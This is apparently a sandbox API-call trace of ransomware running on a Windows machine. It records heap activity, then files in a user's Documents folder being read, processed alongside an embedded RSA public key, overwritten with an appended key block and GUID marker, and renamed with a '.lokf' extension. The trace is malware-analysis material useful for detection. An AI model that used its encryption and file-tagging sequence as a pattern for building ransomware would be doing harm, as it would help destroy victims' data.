Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b220 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b238 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b238 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b220 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b238 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b220 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.876] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.876] GetCurrentThreadId () returned 0x9e0 [0058.876] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7cf98 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.877] GetCurrentThreadId () returned 0x9e0 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x32619a0 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b220 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.877] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.877] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b238 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b208 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b250 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b220 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b220 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.878] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.878] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b220 | out: hHeap=0x660000) returned 1 [0058.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.879] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x32679f8 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32679f8 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b250 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b238 | out: hHeap=0x660000) returned 1 [0058.879] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b208 | out: hHeap=0x660000) returned 1 [0058.880] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11def, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.880] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.880] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.880] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.880] CloseHandle (hObject=0x5cc) returned 1 [0058.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269658 [0058.881] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.881] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fyZw8q.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fyzw8q.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fyZw8q.pptx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fyzw8q.pptx.lokf")) returned 1 [0058.882] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb8c76720, ftCreationTime.dwHighDateTime=0x1d5443c, ftLastAccessTime.dwLowDateTime=0xbddb4e60, ftLastAccessTime.dwHighDateTime=0x1d58d3f, ftLastWriteTime.dwLowDateTime=0xbddb4e60, ftLastWriteTime.dwHighDateTime=0x1d58d3f, nFileSizeHigh=0x0, nFileSizeLow=0x1245a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iY-CcZnqhK2oNX.xlsx", cAlternateFileName="IY-CCZ~1.XLS")) returned 1 [0058.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.882] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.882] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iY-CcZnqhK2oNX.xlsx") returned=".xlsx" [0058.882] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iY-CcZnqhK2oNX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iy-ccznqhk2onx.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.882] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=74842) returned 1 [0058.882] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.885] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x12434, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.885] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.885] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.885] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1245a, lpOverlapped=0x0) returned 1 [0058.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.886] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.886] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.886] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.887] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.887] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.887] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.887] GetLastError () returned 0x0 [0058.887] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.887] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.887] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.887] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.887] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.887] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.887] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.888] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1245a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.888] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.888] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.888] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.888] CloseHandle (hObject=0x5cc) returned 1 [0058.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.889] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.889] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iY-CcZnqhK2oNX.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iy-ccznqhk2onx.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\iY-CcZnqhK2oNX.xlsx.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\iy-ccznqhk2onx.xlsx.lokf")) returned 1 [0058.890] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x109f0170, ftCreationTime.dwHighDateTime=0x1d50a5d, ftLastAccessTime.dwLowDateTime=0xdbe66a50, ftLastAccessTime.dwHighDateTime=0x1d513ca, ftLastWriteTime.dwLowDateTime=0xdbe66a50, ftLastWriteTime.dwHighDateTime=0x1d513ca, nFileSizeHigh=0x0, nFileSizeLow=0x175f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jcZ5HOv.docx", cAlternateFileName="JCZ5HO~1.DOC")) returned 1 [0058.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bcd8 [0058.890] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0058.890] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jcZ5HOv.docx") returned=".docx" [0058.890] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\jcZ5HOv.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\jcz5hov.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.890] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=95736) returned 1 [0058.890] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.893] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x175d2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.893] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.893] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.893] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x175f8, lpOverlapped=0x0) returned 1 [0058.894] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.894] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.894] lstrlenA (lpString="-----BEGIN PUBLIC 